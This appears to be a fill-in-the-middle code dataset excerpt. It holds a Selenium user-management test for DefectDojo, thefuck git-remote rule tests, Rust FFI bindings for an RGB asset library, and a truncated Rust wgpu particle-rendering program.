file_name
stringlengths 3
137
| prefix
stringlengths 0
918k
| suffix
stringlengths 0
962k
| middle
stringlengths 0
812k
|
---|---|---|---|
user_test.py | import time
import unittest
import sys
from pathlib import Path
from base_test_class import BaseTestCase
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver import ActionChains
class UserTest(BaseTestCase):
@staticmethod
def add_user_read_only_parameter():
f = open('dojo/settings/local_settings.py', 'w')
f.write("USER_PROFILE_EDITABLE=False")
f.close()
@staticmethod
def unset_user_read_only_parameter():
f = open('dojo/settings/local_settings.py', 'w')
f.write("USER_PROFILE_EDITABLE=True")
f.close()
@staticmethod
def reload_service():
Path("dojo/settings/settings.py").touch()
def test_create_user(self):
# Login to the site.
driver = self.driver
# Navigate to the User managegement page
driver.get(self.base_url + "user")
# "Click" the dropdown button to see options
driver.find_element(By.ID, "dropdownMenu1").click()
# "Click" the add prodcut button
driver.find_element(By.LINK_TEXT, "New User").click()
# Fill in the Necessary User Details
# username, first name, last name, email, and permissions
# Don't forget to clear before inserting
# username
driver.find_element(By.ID, "id_username").clear()
driver.find_element(By.ID, "id_username").send_keys("propersahm")
# password
driver.find_element(By.ID, "id_password").clear()
driver.find_element(By.ID, "id_password").send_keys("Def3ctD0jo&")
# First Name
driver.find_element(By.ID, "id_first_name").clear()
driver.find_element(By.ID, "id_first_name").send_keys("Proper")
# Last Name
driver.find_element(By.ID, "id_last_name").clear()
driver.find_element(By.ID, "id_last_name").send_keys("Samuel")
# Email Address
driver.find_element(By.ID, "id_email").clear()
driver.find_element(By.ID, "id_email").send_keys("[email protected]")
# "Click" the submit button to complete the transaction
driver.find_element(By.CSS_SELECTOR, "input.btn.btn-primary").click()
# Query the site to determine if the user has been created
# Assert ot the query to dtermine status of failure
self.assertTrue(self.is_success_message_present(text='User added successfully.') or
self.is_help_message_present(text='A user with that username already exists.'))
def login_standard_page(self):
driver = self.driver
driver.get(self.base_url + "login")
driver.find_element(By.ID, "id_username").clear()
driver.find_element(By.ID, "id_username").send_keys('propersahm')
driver.find_element(By.ID, "id_password").clear()
driver.find_element(By.ID, "id_password").send_keys('Def3ctD0jo&')
driver.find_element(By.CSS_SELECTOR, "button.btn.btn-success").click()
self.assertFalse(self.is_element_by_css_selector_present('.alert-danger', 'Please enter a correct username and password'))
return driver
def test_user_edit_permissions(self):
# Login to the site. Password will have to be modified
# to match an admin password in your own container
driver = self.driver
# Navigate to User Management page
driver.get(self.base_url + "user")
# Select the previously created user to edit
# The User name is not clickable
# so we would have to select specific user by filtering list of users
driver.find_element(By.ID, "show-filters").click() # open d filters
# Insert username to filter by into user name box
driver.find_element(By.ID, "id_username").clear()
driver.find_element(By.ID, "id_username").send_keys("propersahm")
# click on 'apply filter' button
driver.find_element(By.CSS_SELECTOR, "button.btn.btn-sm.btn-secondary").click()
# only the needed user is now available, proceed with opening the context menu and clicking 'Edit' button
driver.find_element(By.ID, "dropdownMenuUser").click()
driver.find_element(By.ID, "editUser").click()
# Select Superuser and Staff Permission
driver.find_element(By.NAME, "is_superuser").click()
driver.find_element(By.NAME, "is_staff").click()
# "Click" the submit button to complete the transaction
driver.find_element(By.CSS_SELECTOR, "input.btn.btn-primary").click()
# Query the site to determine if the User permission has been changed
# Assert ot the query to dtermine status of failure
self.assertTrue(self.is_success_message_present(text='User saved successfully.'))
def test_user_delete(self):
# Login to the site. Password will have to be modified
# to match an admin password in your own container
driver = self.driver
# Navigate to the product page
driver.get(self.base_url + "user")
# Select A user to edit
# The User name is not clickable
# so we would have to select specific user by filtering list of users
driver.find_element(By.ID, "show-filters").click() # open d filters
# Insert username to filter by into user name box
driver.find_element(By.ID, "id_username").clear()
driver.find_element(By.ID, "id_username").send_keys("propersahm")
# click on 'apply filter' button
driver.find_element(By.CSS_SELECTOR, "button.btn.btn-sm.btn-secondary").click()
# only the needed user is now available, proceed with clicking 'View' button
driver.find_element(By.ID, "dropdownMenuUser").click()
driver.find_element(By.ID, "viewUser").click()
# in View User dialog open the menu to click the delete entry
driver.find_element(By.ID, "dropdownMenu1").click()
driver.find_element(By.ID, "deleteUser").click()
# confirm deletion, by clicking delete a second time
driver.find_element(By.CSS_SELECTOR, "button.btn.btn-danger").click()
# Query the site to determine if the User has been deleted
# Assert ot the query to dtermine status of failure
self.assertTrue(self.is_success_message_present(text='User and relationships removed.'))
def test_user_notifications_change(self):
# Login to the site. Password will have to be modified
# to match an admin password in your own container
driver = self.driver
wait = WebDriverWait(driver, 5)
actions = ActionChains(driver)
configuration_menu = driver.find_element(By.ID, 'menu_configuration')
actions.move_to_element(configuration_menu).perform()
wait.until(EC.visibility_of_element_located((By.LINK_TEXT, "Notifications"))).click()
originally_selected = {
'product_added': driver.find_element(By.XPATH, "//input[@name='product_added' and @value='mail']").is_selected(),
'scan_added': driver.find_element(By.XPATH, "//input[@name='scan_added' and @value='mail']").is_selected()
}
driver.find_element(By.XPATH, "//input[@name='product_added' and @value='mail']").click()
driver.find_element(By.XPATH, "//input[@name='scan_added' and @value='mail']").click()
driver.find_element(By.CSS_SELECTOR, "input.btn.btn-primary").click()
self.assertTrue(self.is_success_message_present(text='Settings saved'))
self.assertNotEqual(originally_selected['product_added'],
driver.find_element(By.XPATH, "//input[@name='product_added' and @value='mail']").is_selected())
self.assertNotEqual(originally_selected['scan_added'],
driver.find_element(By.XPATH, "//input[@name='scan_added' and @value='mail']").is_selected())
def test_standard_user_login(self):
|
def test_admin_profile_form(self):
self.add_user_read_only_parameter()
self.reload_service()
self.driver.get(self.base_url + "profile")
self.assertTrue(self.driver.find_element(By.ID, 'id_first_name').is_enabled())
def test_user_profile_form_disabled(self):
self.driver.get(self.base_url + "profile")
self.assertFalse(self.driver.find_element(By.ID, 'id_first_name').is_enabled())
def test_user_profile_form_enabled(self):
self.unset_user_read_only_parameter()
# Do not do function reload to avoid double reloading
time.sleep(5)
self.driver.get(self.base_url + "profile")
self.assertTrue(self.driver.find_element(By.ID, 'id_first_name').is_enabled())
def test_forgot_password(self):
driver = self.driver
driver.get(self.base_url + "login")
# Click on link on login screen
driver.find_element_by_id("reset-password").click()
# Submit "Forgot password" form
driver.find_element_by_id("id_email").send_keys("[email protected]")
driver.find_element_by_id("reset-password").click()
self.assertTrue(self.is_text_present_on_page(text='We’ve emailed you instructions for setting your password'))
def suite():
suite = unittest.TestSuite()
# Add each test the the suite to be run
# success and failure is output by the test
suite.addTest(BaseTestCase('test_login'))
suite.addTest(UserTest('test_create_user'))
suite.addTest(UserTest('test_admin_profile_form'))
suite.addTest(BaseTestCase('test_logout'))
suite.addTest(UserTest('test_standard_user_login'))
suite.addTest(UserTest('test_user_profile_form_disabled'))
suite.addTest(UserTest('test_user_profile_form_enabled'))
suite.addTest(BaseTestCase('test_logout'))
suite.addTest(UserTest('test_forgot_password'))
suite.addTest(BaseTestCase('test_login'))
suite.addTest(UserTest('test_user_edit_permissions'))
suite.addTest(UserTest('test_user_delete'))
# not really for the user we created, but still related to user settings
suite.addTest(UserTest('test_user_notifications_change'))
return suite
if __name__ == "__main__":
runner = unittest.TextTestRunner(descriptions=True, failfast=True, verbosity=2)
ret = not runner.run(suite()).wasSuccessful()
BaseTestCase.tearDownDriver()
sys.exit(ret)
| self.login_standard_page() |
test_git_remote_seturl_add.py | import pytest
from thefuck.rules.git_remote_seturl_add import match, get_new_command
from thefuck.types import Command
@pytest.mark.parametrize('command', [
Command('git remote set-url origin url', "fatal: No such remote")])
def test_match(command):
assert match(command)
@pytest.mark.parametrize('command', [
Command('git remote set-url origin url', ""),
Command('git remote add origin url', ''),
Command('git remote remove origin', ''),
Command('git remote prune origin', ''),
Command('git remote set-branches origin branch', '')])
def test_not_match(command):
|
@pytest.mark.parametrize('command, new_command', [
(Command('git remote set-url origin [email protected]:nvbn/thefuck.git', ''),
'git remote add origin [email protected]:nvbn/thefuck.git')])
def test_get_new_command(command, new_command):
assert get_new_command(command) == new_command
| assert not match(command) |
lib.rs | use std::any::TypeId;
use std::collections::hash_map::DefaultHasher;
use std::collections::HashMap;
use std::env;
use std::ffi::{CStr, CString};
use std::hash::{Hash, Hasher};
use std::os::raw::{c_char, c_void};
use log::{info, LevelFilter};
use serde::Deserialize;
use rgb::lnpbp::bitcoin::OutPoint;
use rgb::lnpbp::bp;
use rgb::lnpbp::lnp::transport::zmq::{SocketLocator, UrlError};
use rgb::lnpbp::rgb::{seal, Amount};
use rgb::fungible::{Invoice, IssueStructure, Outcoins};
use rgb::i9n::*;
use rgb::rgbd::ContractName;
use rgb::util::SealSpec;
trait CReturnType: Sized + 'static {
fn from_opaque(other: &COpaqueStruct) -> Result<&mut Self, String> {
let mut hasher = DefaultHasher::new();
TypeId::of::<Self>().hash(&mut hasher);
let ty = hasher.finish();
if other.ty != ty {
return Err(String::from("Type mismatch"));
}
let boxed = unsafe { Box::from_raw(other.ptr.clone() as *mut Self) };
Ok(Box::leak(boxed))
}
}
impl CReturnType for Runtime {}
impl CReturnType for String {}
impl CReturnType for () {}
#[repr(C)]
pub struct COpaqueStruct {
ptr: *const c_void,
ty: u64,
}
impl COpaqueStruct {
fn new<T: 'static>(other: T) -> Self {
let mut hasher = DefaultHasher::new();
TypeId::of::<T>().hash(&mut hasher);
let ty = hasher.finish();
COpaqueStruct {
ptr: Box::into_raw(Box::new(other)) as *const c_void,
ty,
}
}
fn raw<T>(ptr: *const T) -> Self {
COpaqueStruct {
ptr: ptr as *const c_void,
ty: 0,
}
}
}
#[repr(C)]
pub struct CErrorDetails {
message: *const c_char,
}
fn string_to_ptr(other: String) -> *const c_char {
let cstr = match CString::new(other) {
Ok(cstr) => cstr,
Err(_) => CString::new(String::from(
"Error converting string: contains a null-char",
))
.unwrap(),
};
cstr.into_raw()
}
fn ptr_to_string(ptr: *mut c_char) -> Result<String, String> {
unsafe {
CStr::from_ptr(ptr)
.to_str()
.map(|s| s.into())
.map_err(|e| format!("{:?}", e))
}
}
#[repr(C)]
pub enum CResultValue {
Ok,
Err,
}
#[repr(C)]
pub struct CResult {
result: CResultValue,
inner: COpaqueStruct,
}
impl<T: 'static, E> From<Result<T, E>> for CResult
where
E: std::fmt::Debug,
{
fn from(other: Result<T, E>) -> Self {
match other {
Ok(d) => CResult {
result: CResultValue::Ok,
inner: COpaqueStruct::new(d),
},
Err(e) => CResult {
result: CResultValue::Err,
inner: COpaqueStruct::raw(string_to_ptr(format!("{:?}", e))),
},
}
}
}
#[derive(Debug, Deserialize)]
struct StartRgbArgs {
#[serde(with = "serde_with::rust::display_fromstr")]
network: bp::Network,
#[serde(with = "serde_with::rust::display_fromstr")]
stash_endpoint: SocketLocator,
contract_endpoints: HashMap<ContractName, String>,
threaded: bool,
datadir: String,
}
fn _start_rgb(json: *mut c_char) -> Result<Runtime, String> {
let config: StartRgbArgs =
serde_json::from_str(ptr_to_string(json)?.as_str()).map_err(|e| format!("{:?}", e))?;
info!("Config: {:?}", config);
let config = Config {
network: config.network,
stash_endpoint: config.stash_endpoint,
threaded: config.threaded,
data_dir: config.datadir,
contract_endpoints: config
.contract_endpoints
.into_iter()
.map(|(k, v)| -> Result<_, UrlError> { Ok((k, v.parse()?)) })
.collect::<Result<_, _>>()
.map_err(|e| format!("{:?}", e))?,
};
Runtime::init(config).map_err(|e| format!("{:?}", e))
}
#[cfg(target_os = "android")]
fn start_logger() |
#[cfg(not(target_os = "android"))]
fn start_logger() {
env::set_var("RUST_LOG", "trace");
::env_logger::init();
log::set_max_level(LevelFilter::Trace);
}
#[no_mangle]
pub extern "C" fn start_rgb(json: *mut c_char) -> CResult {
start_logger();
info!("Starting RGB...");
_start_rgb(json).into()
}
#[derive(Debug, Deserialize)]
struct IssueArgs {
#[serde(with = "serde_with::rust::display_fromstr")]
network: bp::Network,
ticker: String,
name: String,
#[serde(default)]
description: Option<String>,
issue_structure: IssueStructure,
#[serde(default)]
allocations: Vec<Outcoins>,
precision: u8,
#[serde(default)]
prune_seals: Vec<SealSpec>,
#[serde(default)]
dust_limit: Option<Amount>,
}
fn _issue(runtime: &COpaqueStruct, json: *mut c_char) -> Result<(), String> {
let runtime = Runtime::from_opaque(runtime)?;
let data: IssueArgs =
serde_json::from_str(ptr_to_string(json)?.as_str()).map_err(|e| format!("{:?}", e))?;
info!("{:?}", data);
runtime
.issue(
data.network,
data.ticker,
data.name,
data.description,
data.issue_structure,
data.allocations,
data.precision,
data.prune_seals,
data.dust_limit,
)
.map_err(|e| format!("{:?}", e))
}
#[no_mangle]
pub extern "C" fn issue(runtime: &COpaqueStruct, json: *mut c_char) -> CResult {
_issue(runtime, json).into()
}
#[derive(Debug, Deserialize)]
struct TransferArgs {
inputs: Vec<OutPoint>,
allocate: Vec<Outcoins>,
#[serde(with = "serde_with::rust::display_fromstr")]
invoice: Invoice,
prototype_psbt: String,
fee: u64,
change: Option<seal::Confidential>,
consignment_file: String,
transaction_file: String,
}
fn _transfer(runtime: &COpaqueStruct, json: *mut c_char) -> Result<(), String> {
let runtime = Runtime::from_opaque(runtime)?;
let data: TransferArgs =
serde_json::from_str(ptr_to_string(json)?.as_str()).map_err(|e| format!("{:?}", e))?;
info!("{:?}", data);
runtime
.transfer(
data.inputs,
data.allocate,
data.invoice,
data.prototype_psbt,
data.fee,
data.change,
data.consignment_file,
data.transaction_file,
)
.map_err(|e| format!("{:?}", e))
.map(|_| ())
//.and_then(|r| serde_json::to_string(&r).map_err(|e| format!("{:?}", e)))
}
#[no_mangle]
pub extern "C" fn transfer(runtime: &COpaqueStruct, json: *mut c_char) -> CResult {
_transfer(runtime, json).into()
}
| {
android_logger::init_once(android_logger::Config::default().with_min_level(log::Level::Debug));
} |
main.rs | use image::{self, DynamicImage, GenericImageView};
use pollster::FutureExt;
use rand::{
distributions::{Distribution, Uniform},
SeedableRng,
};
use std::mem;
use wgpu::util::DeviceExt;
use winit::{
dpi::PhysicalSize,
event::*,
event_loop::{ControlFlow, EventLoop},
window::{Window, WindowBuilder},
};
const PARTICLES_PER_GROUP: u32 = 64;
const DOT_SIZE: f32 = 0.005;
const NUM_PARTICLES: u32 = 16384;
const Q_CHARGE: f32 = 0.05;
const BLANK_LEVEL: f32 = 0.95;
const TIME_DELTA: f32 = 0.001;
const D_MAX: f32 = 0.005;
const SUSTAIN: f32 = 0.95;
struct Model {
surface: wgpu::Surface,
device: wgpu::Device,
queue: wgpu::Queue,
particle_bind_groups: Vec<wgpu::BindGroup>,
particle_buffers: Vec<wgpu::Buffer>,
vertices_buffer: wgpu::Buffer,
texture_bind_group: wgpu::BindGroup,
compute_pipeline: wgpu::ComputePipeline,
render_pipeline: wgpu::RenderPipeline,
parameter_bind_group_layout: wgpu::BindGroupLayout,
work_group_count: u32,
texture_size: wgpu::Extent3d,
frames: Vec<Vec<u8>>,
frame_num: usize,
}
impl Model {
async fn new(window: &Window) -> Self {
let size = window.inner_size();
let instance = wgpu::Instance::new(wgpu::Backends::all());
let surface = unsafe { instance.create_surface(window) };
let adapter = instance
.request_adapter(&wgpu::RequestAdapterOptions {
power_preference: wgpu::PowerPreference::default(),
compatible_surface: Some(&surface),
force_fallback_adapter: false,
})
.await
.unwrap();
let (device, queue) = adapter
.request_device(
&wgpu::DeviceDescriptor {
label: None,
features: wgpu::Features::empty(),
limits: wgpu::Limits::default(),
},
None,
)
.await
.unwrap();
let config = wgpu::SurfaceConfiguration {
usage: wgpu::TextureUsages::RENDER_ATTACHMENT,
format: surface.get_preferred_format(&adapter).unwrap(),
width: size.width,
height: size.height,
present_mode: wgpu::PresentMode::Fifo,
};
surface.configure(&device, &config);
let work_group_count =
((NUM_PARTICLES as f32) / (PARTICLES_PER_GROUP as f32)).ceil() as u32;
let draw_shader = device.create_shader_module(&wgpu::include_wgsl!("draw.wgsl"));
let gray_scale_shader = device.create_shader_module(&wgpu::include_wgsl!("grayscale.wgsl"));
let cache_shader = device.create_shader_module(&wgpu::include_wgsl!("cache.wgsl"));
let compute_shader = device.create_shader_module(&wgpu::include_wgsl!("compute.wgsl"));
let img_bytes = include_bytes!("../assets/cat_3_square.png");
let img = image::load_from_memory(img_bytes).unwrap();
let (w, h) = img.dimensions();
let texture_size = wgpu::Extent3d {
width: w,
height: h,
depth_or_array_layers: 1,
};
let gray_texture =
create_gray_texture(&device, &queue, &img, &gray_scale_shader, texture_size);
let cache_texture =
create_cache_texture(&device, &queue, &gray_texture, &cache_shader, texture_size);
let img_bytes2 = include_bytes!("../assets/cat_face.png");
let img2 = image::load_from_memory(img_bytes2).unwrap();
let (w, h) = img2.dimensions();
let texture_size2 = wgpu::Extent3d {
width: w,
height: h,
depth_or_array_layers: 1,
};
let gray_texture2 =
create_gray_texture(&device, &queue, &img2, &gray_scale_shader, texture_size2);
let cache_texture2 = create_cache_texture(
&device,
&queue,
&gray_texture2,
&cache_shader,
texture_size2,
);
let param_data = create_param_data(0.0);
let parameter_bind_group_layout =
create_parameter_bind_group_layout(&device, param_data.len());
let texture_bind_group_layout =
device.create_bind_group_layout(&wgpu::BindGroupLayoutDescriptor {
entries: &[
wgpu::BindGroupLayoutEntry {
binding: 0,
visibility: wgpu::ShaderStages::COMPUTE,
ty: wgpu::BindingType::Texture {
multisampled: false,
view_dimension: wgpu::TextureViewDimension::D2,
sample_type: wgpu::TextureSampleType::Float { filterable: false },
},
count: None,
},
wgpu::BindGroupLayoutEntry {
binding: 1,
visibility: wgpu::ShaderStages::COMPUTE,
ty: wgpu::BindingType::Texture {
multisampled: false,
view_dimension: wgpu::TextureViewDimension::D2,
sample_type: wgpu::TextureSampleType::Float { filterable: false },
},
count: None,
},
],
label: Some("texture bind group layout"),
});
let texture_bind_group = device.create_bind_group(&wgpu::BindGroupDescriptor {
layout: &texture_bind_group_layout,
entries: &[
wgpu::BindGroupEntry {
binding: 0,
resource: wgpu::BindingResource::TextureView(
&cache_texture.create_view(&wgpu::TextureViewDescriptor::default()),
),
},
wgpu::BindGroupEntry {
binding: 1,
resource: wgpu::BindingResource::TextureView(
&cache_texture2.create_view(&wgpu::TextureViewDescriptor::default()),
),
},
],
label: Some("texture bind group"),
});
let compute_bind_group_layout = create_compute_bind_group_layout(&device);
let compute_pipeline_layout = create_compute_pipeline_layout(
&device,
¶meter_bind_group_layout,
&compute_bind_group_layout,
&texture_bind_group_layout,
);
let compute_pipeline =
create_compute_pipeline(&device, &compute_pipeline_layout, &compute_shader);
let render_pipeline_layout = create_render_pipeline_layout(&device);
let render_pipeline =
create_render_pipeline(&device, &draw_shader, &config, &render_pipeline_layout);
let vertices_buffer = create_vertices_buffer(&device);
let particle_buffers = create_particle_buffers(&device);
let particle_bind_groups =
create_particle_bind_groups(&device, &compute_bind_group_layout, &particle_buffers);
let frames = Vec::new();
Model {
surface,
device,
queue,
particle_bind_groups,
particle_buffers,
vertices_buffer,
texture_bind_group,
compute_pipeline,
render_pipeline,
parameter_bind_group_layout,
work_group_count,
texture_size,
frames,
frame_num: 0,
}
}
fn input(&mut self, _: &WindowEvent) -> bool {
false
}
fn update(&mut self) {}
fn render_frame(&mut self) -> anyhow::Result<()> {
let mut command_encoder = self
.device
.create_command_encoder(&wgpu::CommandEncoderDescriptor { label: None });
let target_texture = self.device.create_texture(&wgpu::TextureDescriptor {
size: self.texture_size,
mip_level_count: 1,
sample_count: 1,
dimension: wgpu::TextureDimension::D2,
format: wgpu::TextureFormat::Bgra8UnormSrgb,
usage: wgpu::TextureUsages::COPY_SRC | wgpu::TextureUsages::RENDER_ATTACHMENT,
label: None,
});
let color_attachments = [wgpu::RenderPassColorAttachment {
view: &target_texture.create_view(&wgpu::TextureViewDescriptor::default()),
resolve_target: None,
ops: wgpu::Operations {
load: wgpu::LoadOp::Clear(wgpu::Color {
r: 1.0,
g: 1.0,
b: 1.0,
a: 1.0,
}),
store: true,
},
}];
let render_pass_descriptor = wgpu::RenderPassDescriptor {
label: None,
color_attachments: &color_attachments,
depth_stencil_attachment: None,
};
{
let mut render_pass = command_encoder.begin_render_pass(&render_pass_descriptor);
render_pass.set_pipeline(&self.render_pipeline);
render_pass
.set_vertex_buffer(0, self.particle_buffers[(self.frame_num + 1) % 2].slice(..));
render_pass.set_vertex_buffer(1, self.vertices_buffer.slice(..));
render_pass.draw(0..24, 0..NUM_PARTICLES);
}
let padded_bytes_per_row = padded_bytes_per_row(self.texture_size.width);
let unpadded_bytes_per_row = self.texture_size.width as usize * 4;
let output_buffer_size = padded_bytes_per_row as u64
* self.texture_size.height as u64
* std::mem::size_of::<u8>() as u64;
let output_buffer = self.device.create_buffer(&wgpu::BufferDescriptor {
label: None,
size: output_buffer_size,
usage: wgpu::BufferUsages::COPY_DST | wgpu::BufferUsages::MAP_READ,
mapped_at_creation: false,
});
command_encoder.copy_texture_to_buffer(
wgpu::ImageCopyTexture {
aspect: wgpu::TextureAspect::All,
texture: &target_texture,
mip_level: 0,
origin: wgpu::Origin3d::ZERO,
},
wgpu::ImageCopyBuffer {
buffer: &output_buffer,
layout: wgpu::ImageDataLayout {
offset: 0,
bytes_per_row: std::num::NonZeroU32::new(padded_bytes_per_row as u32),
rows_per_image: std::num::NonZeroU32::new(self.texture_size.height),
},
},
self.texture_size,
);
self.queue.submit(Some(command_encoder.finish()));
let buffer_slice = output_buffer.slice(..);
let mapping = buffer_slice.map_async(wgpu::MapMode::Read);
self.device.poll(wgpu::Maintain::Wait);
mapping.block_on().unwrap();
let padded_data = buffer_slice.get_mapped_range();
let data = padded_data
.chunks(padded_bytes_per_row as _)
.map(|chunk| &chunk[..unpadded_bytes_per_row as _])
.flatten()
.map(|x| *x)
.collect::<Vec<_>>();
drop(padded_data);
output_buffer.unmap();
self.frames.push(data);
Ok(())
}
fn render(&mut self) -> Result<(), wgpu::SurfaceError> {
let parameter_data = create_param_data(self.frame_num as f32);
let parameter_buffer = create_parameter_buffer(&self.device, ¶meter_data);
let parameter_bind_group = create_parameter_bind_group(
&self.device,
&self.parameter_bind_group_layout,
¶meter_buffer,
);
let mut command_encoder = self
.device
.create_command_encoder(&wgpu::CommandEncoderDescriptor { label: None });
{
let mut compute_pass =
command_encoder.begin_compute_pass(&wgpu::ComputePassDescriptor { label: None });
compute_pass.set_pipeline(&self.compute_pipeline);
compute_pass.set_bind_group(0, ¶meter_bind_group, &[]);
compute_pass.set_bind_group(1, &self.particle_bind_groups[self.frame_num % 2], &[]);
compute_pass.set_bind_group(2, &self.texture_bind_group, &[]);
compute_pass.dispatch(self.work_group_count, 1, 1);
}
let frame = self.surface.get_current_texture()?;
let view = frame
.texture
.create_view(&wgpu::TextureViewDescriptor::default());
let color_attachments = [wgpu::RenderPassColorAttachment {
view: &view,
resolve_target: None,
ops: wgpu::Operations {
load: wgpu::LoadOp::Clear(wgpu::Color {
r: 1.0,
g: 1.0,
b: 1.0,
a: 1.0,
}),
store: true,
},
}];
let render_pass_descriptor = wgpu::RenderPassDescriptor {
label: None,
color_attachments: &color_attachments,
depth_stencil_attachment: None,
};
{
let mut render_pass = command_encoder.begin_render_pass(&render_pass_descriptor);
render_pass.set_pipeline(&self.render_pipeline);
render_pass
.set_vertex_buffer(0, self.particle_buffers[(self.frame_num + 1) % 2].slice(..));
render_pass.set_vertex_buffer(1, self.vertices_buffer.slice(..));
render_pass.draw(0..24, 0..NUM_PARTICLES);
}
self.queue.submit(Some(command_encoder.finish()));
frame.present();
if self.frame_num % 6 == 0 {
self.render_frame().unwrap();
}
self.frame_num += 1;
if self.frame_num == 270 {
println!("saving...");
save_gif(
"output.gif",
&mut self.frames,
1,
self.texture_size.width as u16,
)
.unwrap();
println!("saved!!!");
}
Ok(())
}
}
fn | () {
env_logger::init();
let event_loop = EventLoop::new();
let window = WindowBuilder::new()
.with_inner_size(PhysicalSize::new(1800.0, 1800.0))
.build(&event_loop)
.unwrap();
let mut model: Model = pollster::block_on(Model::new(&window));
event_loop.run(move |event, _, control_flow| match event {
Event::WindowEvent {
ref event,
window_id,
} if window_id == window.id() => {
if !model.input(event) {
match event {
WindowEvent::CloseRequested
| WindowEvent::KeyboardInput {
input:
KeyboardInput {
state: ElementState::Pressed,
virtual_keycode: Some(VirtualKeyCode::Escape),
..
},
..
} => *control_flow = ControlFlow::Exit,
_ => {}
}
}
}
Event::RedrawRequested(_) => {
model.update();
match model.render() {
Ok(_) => {}
Err(wgpu::SurfaceError::OutOfMemory) => *control_flow = ControlFlow::Exit,
Err(e) => eprintln!("{:?}", e),
}
}
Event::RedrawEventsCleared => {
window.request_redraw();
}
_ => {}
});
}
fn create_param_data(frame_count: f32) -> Vec<f32> {
let dt = TIME_DELTA;
let dt_2 = 0.5 * dt;
let dtt = dt * dt;
let v_max = D_MAX / dt;
let pi = std::f32::consts::PI;
return vec![
Q_CHARGE,
BLANK_LEVEL,
TIME_DELTA,
D_MAX,
SUSTAIN,
dt,
dt_2,
dtt,
v_max,
frame_count,
pi,
];
}
fn create_parameter_bind_group_layout(
device: &wgpu::Device,
parameter_size: usize,
) -> wgpu::BindGroupLayout {
device.create_bind_group_layout(&wgpu::BindGroupLayoutDescriptor {
entries: &[wgpu::BindGroupLayoutEntry {
binding: 0,
visibility: wgpu::ShaderStages::COMPUTE,
ty: wgpu::BindingType::Buffer {
ty: wgpu::BufferBindingType::Uniform,
has_dynamic_offset: false,
min_binding_size: wgpu::BufferSize::new(
(parameter_size * mem::size_of::<f32>()) as _,
),
},
count: None,
}],
label: None,
})
}
fn create_compute_bind_group_layout(device: &wgpu::Device) -> wgpu::BindGroupLayout {
device.create_bind_group_layout(&wgpu::BindGroupLayoutDescriptor {
entries: &[
wgpu::BindGroupLayoutEntry {
binding: 0,
visibility: wgpu::ShaderStages::COMPUTE,
ty: wgpu::BindingType::Buffer {
ty: wgpu::BufferBindingType::Storage { read_only: true },
has_dynamic_offset: false,
min_binding_size: wgpu::BufferSize::new((NUM_PARTICLES * 16) as _),
},
count: None,
},
wgpu::BindGroupLayoutEntry {
binding: 1,
visibility: wgpu::ShaderStages::COMPUTE,
ty: wgpu::BindingType::Buffer {
ty: wgpu::BufferBindingType::Storage { read_only: false },
has_dynamic_offset: false,
min_binding_size: wgpu::BufferSize::new((NUM_PARTICLES * 16) as _),
},
count: None,
},
],
label: None,
})
}
fn create_compute_pipeline_layout(
device: &wgpu::Device,
parameter_bind_group_layout: &wgpu::BindGroupLayout,
compute_bind_group_layout: &wgpu::BindGroupLayout,
texture_bind_group_layout: &wgpu::BindGroupLayout,
) -> wgpu::PipelineLayout {
device.create_pipeline_layout(&wgpu::PipelineLayoutDescriptor {
label: Some("compute"),
bind_group_layouts: &[
parameter_bind_group_layout,
compute_bind_group_layout,
texture_bind_group_layout,
],
push_constant_ranges: &[],
})
}
fn create_compute_pipeline(
device: &wgpu::Device,
compute_pipeline_layout: &wgpu::PipelineLayout,
compute_shader: &wgpu::ShaderModule,
) -> wgpu::ComputePipeline {
device.create_compute_pipeline(&wgpu::ComputePipelineDescriptor {
label: Some("Compute Pipeline"),
layout: Some(&compute_pipeline_layout),
module: compute_shader,
entry_point: "main",
})
}
fn create_render_pipeline_layout(device: &wgpu::Device) -> wgpu::PipelineLayout {
device.create_pipeline_layout(&wgpu::PipelineLayoutDescriptor {
label: Some("render"),
bind_group_layouts: &[],
push_constant_ranges: &[],
})
}
fn create_render_pipeline(
device: &wgpu::Device,
draw_shader: &wgpu::ShaderModule,
config: &wgpu::SurfaceConfiguration,
render_pipeline_layout: &wgpu::PipelineLayout,
) -> wgpu::RenderPipeline {
device.create_render_pipeline(&wgpu::RenderPipelineDescriptor {
label: None,
layout: Some(&render_pipeline_layout),
vertex: wgpu::VertexState {
module: &draw_shader,
entry_point: "main_vs",
buffers: &[
wgpu::VertexBufferLayout {
array_stride: 6 * 4,
step_mode: wgpu::VertexStepMode::Instance,
attributes: &wgpu::vertex_attr_array![0 => Float32x2, 1 => Float32x2, 2 => Float32x2],
},
wgpu::VertexBufferLayout {
array_stride: 2 * 4,
step_mode: wgpu::VertexStepMode::Vertex,
attributes: &wgpu::vertex_attr_array![3 => Float32x2],
},
],
},
fragment: Some(wgpu::FragmentState {
module: &draw_shader,
entry_point: "main_fs",
targets: &[config.format.into()],
}),
primitive: wgpu::PrimitiveState::default(),
depth_stencil: None,
multisample: wgpu::MultisampleState::default(),
multiview: None,
})
}
fn create_vertices_buffer(device: &wgpu::Device) -> wgpu::Buffer {
// 8 * 6
let mut vertex_buffer_data: [f32; 48] = [0.0; 48];
let theta = 2.0 * std::f32::consts::PI / 8.0;
for i in 0..8 {
vertex_buffer_data[6 * i] = 0.0;
vertex_buffer_data[6 * i + 1] = 0.0;
vertex_buffer_data[6 * i + 2] = DOT_SIZE * (i as f32 * theta).cos();
vertex_buffer_data[6 * i + 3] = DOT_SIZE * (i as f32 * theta).sin();
vertex_buffer_data[6 * i + 4] = DOT_SIZE * ((i as f32 + 1.0) * theta).cos();
vertex_buffer_data[6 * i + 5] = DOT_SIZE * ((i as f32 + 1.0) * theta).sin();
}
device.create_buffer_init(&wgpu::util::BufferInitDescriptor {
label: Some("Vertex Buffer"),
contents: bytemuck::bytes_of(&vertex_buffer_data),
usage: wgpu::BufferUsages::VERTEX | wgpu::BufferUsages::COPY_DST,
})
}
fn create_particle_buffers(device: &wgpu::Device) -> Vec<wgpu::Buffer> {
let mut initial_particle_data: Vec<f32> = vec![0.0; (6 * NUM_PARTICLES) as usize];
let mut rng = rand::rngs::StdRng::seed_from_u64(333);
let unif = Uniform::new_inclusive(-1.0, 1.0);
for particle_instance_chunk in initial_particle_data.chunks_mut(6) {
particle_instance_chunk[0] = unif.sample(&mut rng);
particle_instance_chunk[1] = unif.sample(&mut rng);
particle_instance_chunk[2] = 0.0;
particle_instance_chunk[3] = 0.0;
particle_instance_chunk[4] = 0.0;
